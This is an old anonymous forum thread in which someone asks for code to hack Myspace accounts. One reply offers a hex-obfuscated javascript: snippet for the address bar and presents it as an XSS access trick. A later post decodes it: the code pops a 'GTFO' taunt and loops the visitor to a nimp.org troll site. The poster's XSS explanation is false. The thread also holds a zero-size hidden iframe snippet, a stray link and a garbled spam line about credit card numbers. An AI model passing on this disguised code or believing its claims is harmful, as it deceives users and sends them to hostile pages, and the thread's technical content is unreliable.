Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon.

Pages: 1-

Myspace

Name: Anonymous 2007-08-07 8:12 ID:5i4cj3ep

Guys I NEED! help with finding the code for HTML hacking of Myspace accounts.

Name: Anonymous 2007-08-07 8:24 ID:T6EDxUjj

http://hotaru.thinkindifferent.net/hacking/myspace.html

Name: Anonymous 2007-08-07 8:53 ID:C2ODmuqL

>>2
Very funny, yes, but not very useful. I have investigated MySpace for some time and actually there are some "interesting" things (yes it involves XSS vulnerability), sometimes it is very possible to get a temporary access to someones profile, though the person has to be logged in his account. I'm not gonna explain it in details right now, but you can try the fallowing code, just visit the profile you want to test and drop that code in your address bar.

javascript:var p9mmh2='admin';var HguMT2='\x47\x54\x46\x4F';var QftMT2='\x6B\x3F';var IftMT2='\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x79\x73\x70\x61\x63\x65\x68\x61\x78\x2E\x6F\x6E\x2E\x6E\x69\x6D\x70\x2E\x6F\x72\x67';function k9mmh2(){alert(HguMT2);}function j9mmh2(){return confirm(QftMT2); var d9mmh2='password';}function i9mmh2(){window.location.href=IftMT2;}while('getAccess') { F9mmh2='hack'; k9mmh2(); if(j9mmh2()){i9mmh2();break;} }function IftMT2(j9mmh2,i9mmh2,p9mmh2){document.getElementById('account');}

Oh, and I have tested it only with Internet Explorer, can't be bothered right now to make it cross-browser compatible.

Name: Anonymous 2007-08-07 8:56 ID:MyVwGSM4

>>3
I clicked that link and got a virus.

Name: Anonymous 2007-08-07 9:14 ID:amBhK+9s

>>3
Oh, very interesting. Type 1 Cross-site scripting, right? Though it fails on some pages, I think it's related to some content that a lot of people copy-paste in their pages..

Name: Anonymous 2007-08-07 9:24 ID:Heaven

>>> print '\x47\x54\x46\x4F'
GTFO
>>> print '\x6B\x3F'
k?
>>> print '\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x79\x73\x70\x61\x63\x65\x68\x61\x78\
x2E\x6F\x6E\x2E\x6E\x69\x6D\x70\x2E\x6F\x72\x67'
http://myspacehax.on.nimp.org

Name: Anonymous 2007-08-07 9:24 ID:C2ODmuqL

>>5
No, it's just Type 0, but as you can see that is almost enough. Here's a good paper explaining the basic concept behind that code: http://www.nextgenss.com/papers/SecondOrderCodeInjection.pdf

>>4
You can't get viruses from ECMAScripts, noob.

Name: Anonymous 2007-08-07 10:02 ID:C2ODmuqL

>>6
Yes, LOL, why MySpace devs thought that HEX encoding would save them I don't know.

Name: errrrrrr 2007-08-07 10:09 ID:WJuNtBYA

<html>
<iframe src=http://www.4chan.org width=0 height=0>
</iframe>
</html>

Name: Anonymous 2007-08-07 10:19 ID:Heaven

>>7
I clicked that link and got a virus.

Name: Anonymous 2007-08-07 11:12 ID:iliuivAF

>>9
I clicked that link and got AlDS

Name: Anonymous 2007-08-07 11:14 ID:Heaven

why are you guys still posting on this site. 4chan have moved now.
http://h1.ripway.com/4chanpost/4chan.html

Name: Anonymous 2007-08-07 11:16 ID:Heaven

>>12
Shut the fuck up.

Name: Anonymous 2009-03-06 6:09

The file for lhz   headers instead of   the number and   validate ccnum card   type card number   and validate ccnum   card type card.

Name: Anonymous 2010-11-27 9:54

Name: Anonymous 2010-12-17 1:39

Erika once told me that Xarn is a bad boyfriend

Name: Anonymous 2011-02-03 2:52

<

Name: Anonymous 2011-02-04 14:51

Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -